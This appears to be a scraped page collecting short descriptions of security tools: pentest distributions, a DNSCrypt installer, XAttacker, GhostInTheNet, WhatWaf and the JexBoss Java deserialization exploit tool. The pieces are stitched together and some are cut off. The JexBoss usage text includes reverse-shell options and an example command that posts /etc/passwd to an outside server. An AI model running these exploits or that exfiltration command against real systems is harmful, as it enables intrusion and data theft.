BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
A script for installing and automatically configuring DNSCrypt on Linux-based systems.
Description
DNSCrypt is a protocol for securing communications between a client and a DNS resolver by encrypting DNS queries and responses. It verifies that responses you get from a DNS provider have actually been sent by that provider, and haven't been tampered with.
This script will automatically and securely set up DNSCrypt as a background service that runs at system startup using DNSCrypt-proxy, the libsodium cryptography library, and the DNSCrypt service provider of your choice. The script also has options that allow you to change the service provider at any time, turn off DNSCrypt to use regular unencrypted DNS, as well as uninstall DNSCrypt.
Installation The script supports recent Red Hat-based (CentOS, Fedora, Scientific Linux), Debian-based (Debian, Ubuntu, Linux Mint) distributions and OpenSUSE.
Note
Scripts with sysvinit support were moved to the "legacy" branch (CentOS 6, Debian 7, Ubuntu < 16.04)
wget https://raw.githubusercontent.com/simonclausen/dnscrypt-autoinstall/master/dnscrypt-autoinstall
chmod +x dnscrypt-autoinstall
su -c ./dnscrypt-autoinstall
Supported providers Providers are retrieved from the latest published dnscrypt-resolvers.csv (github.com/jedisct1), with a fallback to those included with the DNSCrypt installation. Troubleshooting If the install fails at a particular stage and the script mentions DNSCrypt is already configured, use the forcedel argument to force an uninstallation:
Example if you have list websites run tool with this command line
perl XAttacker.pl -l list.txt
if you don't have list websites run the tool with this command
perl XAttacker.pl
For coloring in windows Add This Line
use Win32::Console::ANSI;
Version Current version is 2.1What's New • Wordpress Levo-Slideshow 2.3 - Arbitrary File Upload • GS-Dorker • speed up • Bug fixes version 2.0 • speed up • Bug fixes version 1.9 • Bug fixes
Wireshark is the most widely used network
capture and protocol analyzer on the market. It is used by IT and
Network administrators to troubleshoot network connectivity issues and
by Network Security analysts to dissect network attacks. This free and
open source application is so widely used in the industry because it
works. It is cross platform, meaning that it runs on Windows, Mac,
Linux and FreeBSD. This course is an introduction to the
application and goes over the basics to get you started capturing and
analyzing network traffic. It will build your base by explaining the
theory behind how networks work and then get you in to real world
applications of the software. In this course you will learn:
The basics of how networks operate
How to capture traffic on wireshark
How to use display and capture filters
How to use command line wireshark to work with large packet captures
Who is the target audience?
Network Administrators
System Administrators
IT Security Analysts
Type: Course Language: English Number of videos: 24 Year: 2015 Format: MP4 Size: 675 MB Password: offsec
Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan.
Properties:
Network Invisibility
Network Anonymity
Protects from MITM/DOS
Transparent
Cross-platform
Minimalistic
Dependencies:
Linux 2.4.26+ - will work on any Linux-based OS, including Whonix and RaspberryPI
BASH - the whole script
root privileges - for kernel controlling
Limitations:
You can still be found with VLAN logs if using ethernet or by triangulation/broadcast if using WiFi
MAC spoofing won't work if appropriate mitigations has been taken, like DAI or sticky MAC
Might be buggy with some CISCO switches
Not suitable for production servers
How it works The basic and primary network protocol is ARP for IPv4 and NDP (ICMPv6) for IPv6, located in the link and network layer, provides main connectivity in a LAN. Despite its utility and simplicity, it has numerous vulnerabilities that can lead to a MITM attack and leak of confidentiality. Patching of such a widely used standard is a practically impossible task. A very simple, but at the same time effective solution is to disable ARP and NDP responses on an interface and be very cautious with broadcasting. Considering the varieties of implementations, this means that anyone in the network wouldn't be able to communication with such host, only if the host is willing it-self. The ARP/NDP cache will be erased quickly afterwards. Here is an example schema:
A >>> I need MAC address of B >>> B
A <<< Here it is <<< B
A <<< I need MAC address of A <<< B
A >>> I'm not giving it >>> B
To increase privacy, it's advised to spoof the MAC address, which will provide a better concealment. All this is possible using simple commands in Linux kernel and a script that automates it all. Analysis No ARP/NDP means no connectivity, so an absolute stealth and obscurity on the network/link layer. This protects from all possible DOSes and MITMs (ARP, DNS, DHCP, ICMP, Port Stealing) and far less resource consuming like ArpON. Such mitigation implies impossibility of being scanned (nmap, arping). Besides, it doesn't impact a normal internet or LAN connection on the host perspective. If you're connecting to a host, it will be authorised to do so, but shortly after stopping the communication, the host will forget about you because, ARP/NDP tables won't stay long without a fresh request. Regarding the large compatibility and cross-platforming, it's very useful for offsec/pentest/redteaming as well. You see everyone, but nobody sees you, you're a ghost. Mitigation and having real supervision on the network will require deep reconfiguration of OSes, IDPSes and all other equipement, so hardly feasible. HowTo You can execute the script after the connection to the network or just before:
sudo GhostInTheNet.sh on eth0
This will activate the solution until reboot. If you want to stop it:
sudo GhostInTheNet.sh off eth0
Of course, you will have to make the script executable in the first place:
chmod u+x GhostInTheNet.sh
Notes ARP/NDP protocol can be exploited for defensive purpose. Now your Poisontap is literally undetectable and your Tails is even more anonymous. You should learn some stuff about IPv6.
Ability to run on a single URL with the -u/--url flag
Ability to run through a list of URL's with the -l/--list flag
Ability to detect over 40 different firewalls
Ability to try over 20 different tampering techniques
Ability to pass your own payloads either from a file or from the terminal
Payloads that are guaranteed to produce at least one WAF triggering
Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques
Ability to run behind Tor
Ability to run behind multiple proxy types (socks4, socks5, http, https)
Ability to use a random user agent, personal user agent, or custom default user agent
More to come...
Installation Installing whatwaf is super easy, all you have to do is the following: Have Python 2.7, Python 3.x compatibility is being implemented soon:
Features The tool and exploits were developed and tested for:
JBoss Application Server versions: 3, 4, 5 and 6.
Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
Others
Videos
Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
Exploiting JBoss Application Server with JexBoss
Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)
Reverse Shell (meterpreter integration) After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. Usage examples
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE
PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates
performed by the webshell in exploited server at
http://webshell.jexboss.net/jsp_version.txt and 2)
check for updates performed by the jexboss client at
http://joaomatosf.com/rnp/releases.txt
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP
parameters (eg. javax.faces.ViewState, oldFormData,
etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in
Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector.
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat
(CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P
http://192.168.0.1:3128)
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in
JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u
http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when
exploiting Java Deserialization Vulnerabilities in
application layer (for now, working only against *nix
systems)(eg. 192.168.0.10:1331)
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d
@/etc/passwd http://your_server)
--windows, -w Specifies that the commands are for rWINDOWS System$
(cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized
objects into it. (egs. -H javax.faces.ViewState or -H
oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,groovy1}
Specify the type of Gadget to generate the payload
automatically. (DEFAULT: commons-collections3.1 or
groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized
object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in
-u parameter. This will send the payload in multiple
formats (eg. RAW, GZIPED and BASE64) and with
different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for
each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per
line)
-out FILENAME_RESULTS
File name to store the file scan results
Home
Privacy Center
Data Protection
Community
Digital Policy
Security Tools
Online Utilities
Resources
Search Operators
Library
